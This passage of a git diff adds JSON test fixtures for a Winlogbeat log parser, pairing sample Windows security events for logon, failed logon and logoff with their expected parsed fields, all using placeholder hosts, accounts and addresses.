1587 insertions(+), 12 deletions(-) create mode 100644 Beats/winlogbeat/tests/security_event_4624.json create mode 100644 Beats/winlogbeat/tests/security_event_4625.json create mode 100644 Beats/winlogbeat/tests/security_event_4634.json create mode 100644 Beats/winlogbeat/tests/security_event_4662.json create mode 100644 Beats/winlogbeat/tests/security_event_4672.json create mode 100644 Beats/winlogbeat/tests/security_event_4689.json create mode 100644 Beats/winlogbeat/tests/security_event_4720.json create mode 100644 Beats/winlogbeat/tests/security_event_4722.json create mode 100644 Beats/winlogbeat/tests/security_event_4723.json create mode 100644 Beats/winlogbeat/tests/security_event_4725.json create mode 100644 Beats/winlogbeat/tests/security_event_4726.json create mode 100644 Beats/winlogbeat/tests/security_event_4768.json create mode 100644 
Beats/winlogbeat/tests/security_event_4769.json create mode 100644 Beats/winlogbeat/tests/security_event_4798.json diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..9e8cdfb26 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json 
@@ -0,0 +1,145 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + 
"hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json new file mode 100644 index 000000000..ac5882d46 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4625.json 
@@ -0,0 +1,193 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\
"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" 
+ ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ], + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "name": "hostname", + "os": { + "build": "14393.7428", + "family": "windows", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 + }, + "related": { + "hosts": [ + "WORKSTATION", + 
"hostname" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "source": { + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 + }, + "user": { + "id": "S-1-2-3", + "name": "WORKSTATION$", + "target": { + "id": "S-1-0-0" + } + }, + "winlog": { + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", + "keywords": [ + "Audit Failure" + ], + "logon": { + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2552812283", + "task": "Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json new file mode 100644 index 000000000..ddc69e63b --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4634.json 
@@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 